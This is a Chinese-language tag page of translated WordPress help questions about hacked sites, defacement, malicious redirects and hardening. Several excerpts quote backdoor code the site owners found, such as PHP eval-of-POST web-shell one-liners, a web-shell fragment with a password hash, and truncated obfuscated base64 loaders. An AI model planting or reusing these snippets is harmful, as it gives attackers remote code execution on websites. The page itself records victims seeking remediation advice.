您当前的位置:首页 > TAG信息列表 > hacked

  • Change WP-Login or WP-Admin

    时间:2011-07-27

    我是否可以更改wp登录名或wp管理文件的名称,以便我可以转到其他文件名进行登录。我试图阻止黑客找到我的登录名,而wp登录名已成为一个非常明显的选项。

  • 全新安装WP时被WebSense阻止的站点

    时间:2011-08-10

    刚刚发布了一个新的WP 3.2.1安装,运行于2011年,其中一个帖子“即将发布”。我还没有开始开发这个网站。在我的工作场所,它目前被WebSense屏蔽为“潜在的破坏性内容”,但我昨天能够访问该网站。我的网站是否被黑客攻击或有垃圾邮件链接,或者网络过滤器是否与我新获得的自由感不同?:)该网站是here, 由于整个web筛选器问题,我当前无法检查它。它在我的iPhone上看起来不错,但我无法查看源代码。Theme: 十一(无修改)Plugins: 删除双空格

  • How was my WP site hacked

    时间:2011-08-19

    我的网站,http://www.cancer-study.com, 已被黑客攻击,我无法登录到wp管理员。你能说一下它是如何被黑客入侵的吗?我能做些什么来修复损坏?我可以访问主机。

  • Wordpress Hacks/Defacing

    时间:2011-09-14

    我想弄清楚Wordpress网站是如何被破坏/黑客入侵的。我非常了解发展。我知道如何保护代码等。但我最近发现,大量Wordpress网站正在遭到破坏。我开发的两个网站和其他网站。它只是过时的Wordpress安装吗?即使Wordpress运行的是3.1版,网站仍然被破坏。所有用户输入均在前端和后端进行验证。尽可能使用WP NONCE。服务器相当安全(不是777)。????我对Wordpress失去了信心。如果是我的错,我很乐意承认并修复,但唯一的答案似乎是过时的Wordpress网站,我觉得这很难相信。

  • 当外部人员侵入我的网络日志并更改我的显示名称时,我该怎么办?

    时间:2011-09-23

    昨晚,我在自己的博客上写了一篇关于宗教的有点争议的博文,今天早上醒来后发现我的展示名已改为一位狂热的宗教领袖的名字。该名称实际上已添加到user\\u元数据库中;删除该值会将我的显示名恢复为用户名。怎么会发生这种情况?我能做些什么来防范它?

  • 我的WordPress站点中的奇怪代码和我的网站运行太慢

    时间:2011-10-21

    我有一个wordpress网站,最近我看到加载索引页面太慢了。两周来,我一直在努力寻找问题,但什么也没找到。最后一天,我备份了所有文件,删除了我网站上的所有内容,并在记事本++中打开了我的网站索引页。我看到了太多奇怪的代码,当我在wamp上本地运行我的站点时,我的防病毒程序发出了太多警告,并阻止了许多外部连接。我在我的网站索引页上看到了以下代码:<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0L

  • 在新的服务器上,网站被黑客入侵,权限有点奇怪?请帮帮忙

    时间:2012-01-04

    我最近换了一台新服务器,一周后,一个网站遭到黑客攻击,他们所做的只是更改了索引。当前启用主题的php文件,没什么大不了的。我确实有一些安全预防措施,没有管理员用户名,所有最新版本,没有timthumb问题。htaccess安全等。我不希望这种情况再次发生,我注意到,当登录到我的WP管理员时,我可以编辑永久链接,或编辑器中的任何文件(我测试了编辑index.php),并将其保存。在我的前两台服务器上,我必须进入FTP,在进行任何更改之前,将文件的权限设置为755或777,然后再将其设置回644。它们当前设置

  • Malware on site

    时间:2012-03-27

    嗨,当我尝试进入我的网站时,我被重定向到另一个网站。htaccess文件似乎已更改。当我用Sucuri扫描网站时,我得到了这个错误javascript恶意软件。详细信息:http://sucuri.net/malware/malware-entry-mwhta7地点:http://ca-no.ru/example/status.php 如何永久修复此问题?上周我已经遇到了这个问题,并重置了htaccess文件,但它再次发生。

  • 防止WordPress网站遭到黑客攻击

    时间:2012-04-16

    我的Wordpress网站被沙特阿拉伯的一些黑客入侵。我怎样才能防止他们入侵。我还发现许多其他Wordpress网站也遭到了黑客攻击。

  • Wp Web根目录中的可疑boolan.php文件

    时间:2012-06-23

    今天,我在我的web根目录中注意到一个可疑的php文件:boolian。php和服务器。具有随机名称的html文件,所有文件都包含特洛伊木马。我记得昨天我刚刚上传并激活了我从wordpress下载的几个主题。组织。该网站很好,但我想知道是否有人之前有过这些问题,也许知道是哪个主题或插件导致了这些问题。以下是文件的内容:<?php $auth_pass = \"fbc3709d5836fbef684552208cda1fd9\"; $color = \"#df5\

  • 是否有任何预先存在的插件来跟踪和阻止在我的网站上有可疑活动的IP?

    时间:2012-07-25

    下图显示了最近一次(失败的)尝试破解我的Wordpress安装。我很容易看到这一点,并了解他们在做什么,但是否有一个插件可以监控这些数据并捕获这样的事件?特别是对于这样明目张胆的事情,我想阻止IP,但对我来说,全天候坐着看IP活动并不太现实。有什么想法?

  • 使用主题编辑器上传脚本而损坏的网站

    时间:2012-08-02

    我们已经有几个Wordpress网站被破坏了,所有这些网站都有相同的模式(至少原始的访问日志是这样说的)。从日志中可以看出,他们直接登录Wordpress,然后进入主题编辑器>编辑404。php文件带有恶意代码,他们现在运行该代码来破坏网站。这是日志(该站点替换为example.com)125.167.118.62 - - [01/Aug/2012:14:22:58 +0800] \"GET / HTTP/1.1\" 200 6318 \"-\" \"Mozilla/5.0 (Windows NT

  • 黑客通常在哪里运行他们的黑客脚本?

    时间:2012-08-03

    所以在我寻求解决this mystery, 实际上,我发现一些脚本可能与用来破坏我们网站的脚本类似:http://pastebin.com/raw.php?i=hcvPE8YV现在我的问题是他们通常在哪里运行这个?他们是在被黑客攻击的服务器上还是在自己的电脑上运行?

  • 有没有可能导致wp_USERS表消失的已知错误?

    时间:2012-08-17

    我管理许多WordPress支持的网站。其中一个网站是新的,自一个月前成立以来一直保持原样。今天,我尝试登录,但无法做到-我所有的登录尝试都被拒绝。经过调查,我发现wp_users 缺少表。所有其他表格都存在,博客功能齐全。数据库中的任何条目或任何文件均未表明存在任何形式的黑客行为。我明天就要休假了,这让我有点担心,因为我是唯一负责这些网站的人。当然,我已经更改了所有密码,我可能会重新安装代码库,但我想知道是否有任何常见的bug可能导致这种情况?运行的WP版本为3.4.1。值得注意的安装插件包括WP Su

  • 如果黑客将BLOG_CHARSET更改为UTF-7,是否会使WordPress容易受到进一步的攻击?

    时间:2012-12-24

    我有一个客户最近被黑客攻击了,我注意到她的网站上出现了一些奇怪的角色,比如和。事实证明,黑客在wp_options 数据库中的表。我将其设置回UTF-8,但我想知道在设置为UTF-7期间,是否会产生任何安全漏洞?我搜索了一下发现WordPress UTF-7 vulnerability that was fixed in version 2.0.6. 我们正在运行WordPress的最新版本,因此他们不可能使用该漏洞,但是否有其他与UTF-7相关的漏洞?真的,除了让人痛苦之外,黑客还有什么理由改变blo

  • 被黑客攻击后致命错误:在第1行调用404.php中未定义的函数GET_HEADER()

    时间:2013-01-16

    吃了timthumb之后。利用php。该站点已升级为WP 3.5它再次遭到破坏,(wp config包括加密数据以及wp include目录中的functions.php。在查看了各种网站后,我选择删除所有文件(备份网站后)并重新安装代码,以确保没有损坏的文件,并删除各种主题/插件/和WordPress更新版本中仍然存在的任何不需要的文件。主页会加载,但超出主页的所有链接都不可用,因此会出现此错误致命错误:调用中未定义的函数get\\u header()。。。404.php,第1行。标题和404 php文

  • 重命名“wp-admin”文件夹中的“index.php”以避免被黑客攻击是个好主意吗?

    时间:2013-01-25

    我的wordpress已经被黑客攻击了2到3次。如何提高其安全性?重命名index.php 在里面wp-admin 目录

  • Suspicious Files

    时间:2013-04-13

    嗨,我在我的网站上发现了两个可疑文件:我的主题中的第一个(404.php), 添加此行后<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?></中的第二个/wp-admin/ 调用wp-class.php.唯一的一行是:<?eval($_POST[joao]);?>有人能告诉我这是做什么的,我应该采取什么步骤吗?

  • 用户名已更改为“admin”

    时间:2013-11-17

    我怀疑我的wordpress网站发生了黑客攻击事件。我的用户名已更改为“admin”。如何安全地恢复我的用户名?谢谢

  • 删除被黑客攻击的代码--出主意!

    时间:2014-01-06

    我一直在从事一个项目,该项目不断在配置中插入一些PHP。php文件,它导致了很多SEO问题。在这篇介绍之后,我将粘贴一个示例(它很长)。我已经删除了好几次,更改了FTP密码、管理员密码和用户名、盐并检查了。htaccess-除此之外,我还被卡住了。有没有办法解决这个问题?部分代码,中间删减了很多;eval(gzinflate(base64_decode(\'pRn9c9o49ufczP0PKuPGuHHAGAihiZN2U7q7M9dtj6Y3c5OkjLBl8GJsr2wINM7/fu9J8kcI2du